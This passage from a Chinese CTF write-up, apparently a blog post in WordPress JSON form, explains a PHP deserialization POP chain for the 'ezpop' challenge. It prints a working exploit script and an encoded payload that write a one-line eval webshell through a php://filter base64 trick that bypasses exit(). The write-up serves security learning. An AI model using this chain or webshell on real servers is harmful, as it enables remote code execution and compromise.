\u8fd9\u4e24\u4e2a\u5f88\u7b80\u5355\uff0c\u4e00\u4e2a\u8fd4\u56deint\u578b\u7684expire\uff0c\u53e6\u4e00\u4e2a\u62fc\u63a5options[‘prefix’]\u548c$name<\/p>\n\n\n\n
protected function getExpireTime($expire): int {
\t\treturn (int) $expire;
\t}

\tpublic function getCacheKey(string $name): string {
\t\treturn $this->options['prefix'] . $name;
\t}<\/code><\/pre>\n\n\n\n
\u8fd9\u4e2a\u51fd\u6570\u5c06data\u5148\u683c\u5f0f\u5316\u6210string\u7c7b\u578b\uff0c\u7136\u540e\u6839\u636eoptions[\u2018serialize\u2019]\u7684\u503c\u6765\u5904\u7406data\uff0coptions[\u2018serialize\u2019]\u53ef\u63a7\u3002<\/p>\n\n\n\n
protected function serialize($data): string {
\t\tif (is_numeric($data)) {
\t\t\treturn (string) $data;
\t\t}

\t\t$serialize = $this->options['serialize'];

\t\treturn $serialize($data);
\t}<\/code><\/pre>\n\n\n\n
\u6f2b\u957f\u7684set\u51fd\u6570<\/p>\n\n\n\n
public function set($name, $value, $expire = null): bool{ \n        $this->writeTimes++;\n\n        if (is_null($expire)) {\n            $expire = $this->options['expire']; \n        }\n\n        $expire = $this->getExpireTime($expire);  \/\/\u8fd4\u56deint\u578b\u6570\u636e\uff0coptions['expire']\u7684\n        $filename = $this->getCacheKey($name);  \/\/\u5c06$name\u62fc\u63a5\u5728options['prefix']\u540e\u9762\uff0c\u6700\u540e\u5e94\u8be5\u662f\u8981\u5199\u5165\u7684\u4f4d\u7f6e\n        $dir = dirname($filename);  \/\/\u83b7\u53d6\u8def\u5f84\u4e2d\u7684\u76ee\u5f55\u540d\u79f0\u90e8\u5206\n        if (!is_dir($dir)) {\n            try {\n                mkdir($dir, 0755, true);\n            } catch (\\Exception $e) {\n                \/\/ \u521b\u5efa\u5931\u8d25\n            }\n        }\n        $data = $this->serialize($value);  \/\/\u8be5\u51fd\u6570\u7279\u6b8a\n        if ($this->options['data_compress'] && function_exists('gzcompress')) {  \n            \/\/\u6570\u636e\u538b\u7f29\n            $data = gzcompress($data, 3);\n        }\n        $data = \"<?php\\n\/\/\" . sprintf('%012d', $expire) . \"\\n exit();?>\\n\" . $data;  \/\/\u8fd9\u91cc\u662f\u8981\u6267\u884c\u7684\u6838\u5fc3\u4ee3\u7801\n        $result = file_put_contents($filename, $data);\n        if ($result) {\n            return true;\n        }\n        return false;\n    }\n}\n<\/code><\/pre>\n\n\n\n
\u4ece\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u770b\u5230$result = file_put_contents($filename, $data);\u6211\u4eec\u663e\u7136\u53ef\u4ee5\u901a\u8fc7\u4ed6\u4eec\u5199\u4e00\u53e5\u8bdd\u6728\u9a6c\u3002\u4e5f\u5c31\u662f\u60f3\u65b9\u8bbe\u6cd5\u8ba9data\u7b49\u4e8e\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u7136\u540e\u5199\u5165$filename\u91cc\u3002<\/p>\n\n\n\n
\u5148\u4e0d\u7ba1$filename\u600e\u4e48\u5904\u7406\uff0c\u76f4\u63a5\u50cf$data\u91cc\u6dfb\u52a0\u4e00\u53e5\u8bdd\u6728\u9a6c\u663e\u7136\u662f\u4e0d\u5927\u73b0\u5b9e\u7684\u3002\u56e0\u4e3a\u6211\u4eec\u53ef\u4ee5\u770b\u5230\uff0c$data\u7b49\u4e8e\u4ec0\u4e48\u6709\u70b9\u7279\u6b8a\uff1a<\/p>\n\n\n\n
$data = \"<?php\\n\/\/\" . sprintf('%012d', $expire) . \"\\n exit();?>\\n\" . $data;  <\/code><\/pre>\n\n\n\n
\u56e0\u4e3a\u5b83\u7684\u540e\u9762\u6709\u4e2aexit()\uff0c\u8fd9\u4e2a\u88ab\u79f0\u4e3a\u6b7b\u4ea1\u7ed5\u8fc7\u95ee\u9898\uff0c\u6211\u4eec\u53ef\u4ee5base64\u89e3\u7801\u540e\u5199\u5165\uff0c\u5177\u4f53\u53ef\u53c2\u8003p\u725b\u6587\u7ae0\u8c08\u4e00\u8c08php:\/\/filter\u7684\u5999\u7528<\/a>\u3002\u7b80\u5355\u6765\u8bf4\uff0c\u7531\u4e8e<\u3001?\u3001()\u3001;\u3001>\u3001\\n\u90fd\u4e0d\u662fbase64\u7f16\u7801\u7684\u8303\u56f4\uff0c\u6240\u4ee5base64\u89e3\u7801\u7684\u65f6\u5019\u4f1a\u81ea\u52a8\u5c06\u5176\u5ffd\u7565\uff0c\u6240\u4ee5\u89e3\u7801\u4e4b\u540e\u5c31\u5269php\/\/exit\u4e86\uff0c\u8fd9\u91cc\u67099\u4e2a\u5b57\u7b26\uff0c\u4f46\u662f\u5462base64\u7b97\u6cd5\u89e3\u7801\u65f6\u662f4\u4e2a\u5b57\u8282\u4e00\u7ec4\uff0c\u6240\u4ee5\u6211\u4eec\u8fd8\u9700\u8981\u5728\u524d\u9762\u52a0\u4e9b\u5b57\u7b26\u3002<\/p>\n\n\n\n
\u73b0\u5728\u8ba9\u6211\u4eec\u7528$data\u6765\u5199\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c$data\u7684\u503c\u4ece\u4f55\u800c\u6765\u5462\uff0c\u770b\u5230set\u51fd\u6570\uff0c\u91cc\u9762\u6709\uff1a$data = $this->serialize($value)\uff0c\u6240\u4ee5data\u7684\u503c\u7b49\u4e8eserialize($value)\u3002<\/p>\n\n\n\n
$value\u662fset($name, $value, $expire = null)\u7684\u53c2\u6570\u3002\u800c\u8c03\u7528set\u51fd\u6570\u5b9e\u9645\u4e0a\u662f\u901a\u8fc7\u8c03\u7528$this->store->set($this->key, $contents, $this->expire);\u4e5f\u5c31\u662f\u8bf4$contents\u5c31\u662f$value\uff0c\u800c$contents = $this->getForStorage();\u5373getForStorage()\u51fd\u6570\u7684\u8fd4\u56de\u503c\uff1a<\/p>\n\n\n\n
public function getForStorage() {\n\t\t$cleaned = $this->cleanContents($this->cache);\n\n\t\treturn json_encode([$cleaned, $this->complete]);\n\t}<\/code><\/pre>\n\n\n\n
A::cleanContents(A::cache)<\/code>\u5b9e\u73b0\u4e86\u4e00\u4e2a\u8fc7\u6ee4\u7684\u529f\u80fd\uff0cA::complete<\/code>\u66f4\u5bb9\u6613\u63a7\u5236\uff0c\u76f4\u63a5\u5199\u4e3ashellcode\u3002<\/p>\n\n\n\n
\u7531\u4e8e$value<\/code>\u662f\u4e00\u4e2ajson\u5b57\u7b26\u4e32\uff0c\u7136\u540e\uff0cjson\u5b57\u7b26\u4e32\u7684\u5b57\u7b26\u5747\u4e0d\u662fbase64\u5408\u6cd5\u5b57\u7b26\uff0c\u901a\u8fc7base64_decode<\/code>\u53ef\u4ee5\u76f4\u63a5\u4ecejson\u4e2d\u63d0\u53d6\u51fashellcode\u3002\u6240\u4ee5\u5c06shellcode\u7ecf\u8fc7base64\u7f16\u7801\uff0cB::options['serialize']<\/code>\u8d4b\u503c\u4e3abase64_decode<\/code>\u3002<\/p>\n\n\n\n
\u53c2\u6570\u7684\u8d4b\u503c\u8fc7\u7a0b:<\/p>\n\n\n\n
key->name->filename       \n\/\/key\u53ef\u63a7\u3002\n\n\/\/name\u662fset($name, $value, $expire = null)\u7b2c\u4e00\u4e2a\u53c2\u6570\uff0cB::set()\u7531A::save()\u91cc\n\u7684$this->store->set($this->key, $contents, $this->expire)\u8c03\u7528,\u56e0\u6b64key->name\n\n\/\/$filename = $this->getCacheKey($name)<\/code><\/pre>\n\n\n\n
cache->clean+complete->contents->value->data\n\/\/cache\u548ccomplete\u53ef\u63a7\n\n\/\/getForStorage() \u51fd\u6570\u4e2d\uff1a$cleaned = $this->cleanContents($this->cache);return json_encode([$cleaned, $this->complete]);complete\u53ef\u63a7\uff0c\u5199shell\u3002\u56e0\u6b64cache->clean+complete\n\n\/\/$value\u662fset($name, $value, $expire = null)\u7684\u53c2\u6570\u3002\u800c\u8c03\u7528set\u51fd\u6570\u5b9e\u9645\u4e0a\u662f\u901a\u8fc7\u8c03\u7528$this->store->set($this->key, $contents, $this->expire);\u4e5f\u5c31\u662f\u8bf4$contents\u5c31\u662f$value\uff0c\u800c$contents = $this->getForStorage();\u5373getForStorage()\u51fd\u6570\u7684\u8fd4\u56de\u503c\n\n\/\/set()\uff1a$data = $this->serialize($value)\uff0c\u6240\u4ee5data\u7684\u503c\u7b49\u4e8eserialize($value)\u3002<\/code><\/pre>\n\n\n\n
\u51fd\u6570\u6267\u884c\uff1a<\/p>\n\n\n\n
A::__destruct->save()->getForStorage()->cleanStorage()\nB::save()->set()->getExpireTime()\uff0cgetCacheKey()\uff0cserialize()->file_put_contents\u5199\u5165shell<\/code><\/pre>\n\n\n\n
exp:<\/p>\n\n\n\n
<?php\nclass A{\nprotected $store;\nprotected $key;\nprotected $expire;\n\npublic function __construct()\n{\n    $this->cache = array();\n    $this->complete = base64_encode(\"xxx\".base64_encode('<?php @eval($_POST[\"ro4lsc\"]);?>'));\n    $this->key = \"shell.php\";\n    $this->store = new B();\n    $this->autosave = false;\n    $this->expire = 0;\n}\n}\n\nclass B{\n public $options = array();\n    function __construct()\n    {\n        $this->options['serialize'] = 'base64_decode';\n        $this->options['prefix'] = 'php:\/\/filter\/write=convert.base64-decode\/resource=';\n        $this->options['data_compress'] = false;\n    }\n}\necho urlencode(serialize(new A()));\n?><\/code><\/pre>\n\n\n\n
?data=O%3A1%3A%22A%22%3A6%3A%7Bs%3A8%3A%22%00%2A%00store%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A7%3A%22options%22%3Ba%3A3%3A%7Bs%3A9%3A%22serialize%22%3Bs%3A13%3A%22base64_decode%22%3Bs%3A6%3A%22prefix%22%3Bs%3A50%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3D%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7D%7Ds%3A6%3A%22%00%2A%00key%22%3Bs%3A9%3A%22shell.php%22%3Bs%3A9%3A%22%00%2A%00expire%22%3Bi%3A0%3Bs%3A5%3A%22cache%22%3Ba%3A0%3A%7B%7Ds%3A8%3A%22complete%22%3Bs%3A64%3A%22eHh4UEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lKeWJ6UnNjMk1pWFNrN1B6ND0%3D%22%3Bs%3A8%3A%22autosave%22%3Bb%3A0%3B%7D<\/code><\/pre>\n\n\n\n
\u8f93\u5165\u4e4b\u540e\u4f1a\u5728\u5f53\u524d\u751f\u6210\u4e00\u4e2ashell.php\uff0c\u8681\u5251\u6216\u8005\u83dc\u5200\u8fde\u4e0a\u5c31\u5b8c\u4e86\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
\u80cc\u666f\uff1a \u4e0a\u5468\u6253\u6bd4\u8d5b\u7684\u65f6\u5019\u9047\u5230\u4e86\u4e00\u9053\u53eb\uff1aezpop\u7684\u9898\uff0c\u8fdb\u53bb\u4e00\u770b\u662fphp\uff0c\u6211\u4ee5\u4e3a\u8fd9\u5c31\u662f\u4e00\u9053\u7b80\u5355\u7684\u4e0e\u53cd\u5e8f\u5217\u5316\u6709\u5173\u7684 […]<\/p>\n","protected":false},"author":1,"featured_media":57,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-40","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/40","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=40"}],"version-history":[{"count":3,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/40\/revisions"}],"predecessor-version":[{"id":2884,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/40\/revisions\/2884"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media\/57"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=40"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=40"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=40"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}